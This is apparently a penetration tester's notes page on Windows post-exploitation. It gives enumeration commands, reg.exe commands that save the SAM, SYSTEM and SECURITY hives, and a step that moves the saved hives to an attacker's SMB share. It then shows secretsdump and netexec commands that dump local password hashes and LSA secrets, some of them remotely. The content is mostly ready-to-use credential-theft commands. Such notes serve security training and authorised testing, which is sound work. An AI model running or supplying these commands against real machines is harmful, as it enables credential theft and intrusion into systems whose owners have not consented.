Windows

Gather Info

> systeminfo

net localgroup administrators
net user [username]

https://github.com/411Hall/JAWS

Password Attacks

Registry Hives

HKLM\SAM

Contains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords.

HKLM\SYSTEM

Stores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes.

HKLM\SECURITY

Contains sensitive information used by the Local Security Authority (LSA), including cached domain credentials (DCC2), cleartext passwords, DPAPI keys, and more.

Using reg.exe to copy registry hives

This must be done with Admin privileges

# SAM
reg.exe save hklm\sam C:\sam.save
# SYSTEM
reg.exe save hklm\system C:\system.save
# SECURITY
reg.exe save hklm\security C:\security.save

Create an SMB share to transfer the files to your machine (impacket-smbserver)

Use move command to move files to SMB share

Using secretsdump to dump hashes

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Dumping LSA secrets remotely

We can sometimes dump LSA secrets with netexec:

nxc smb [target] --local-auth  -u [user] -p [pass] --lsa

You may also be able to do the same with the SAM

nxc smb [target] --local-auth  -u [user] -p [pass] --sam

Alternate Data Streams

File attribute only found on NTFS File Systems

dir /R
more < [hidden data]

Introduction to Alternate Data Streams | Malwarebytes LabsMalwarebytes

PreviousPage 2 NextEnumeration

Last updated 1 month ago

hashtagGather Info

hashtagPassword Attacks

hashtagRegistry Hives

hashtagUsing reg.exe to copy registry hives

hashtagUsing secretsdump to dump hashes

hashtagDumping LSA secrets remotely

hashtagAlternate Data Streams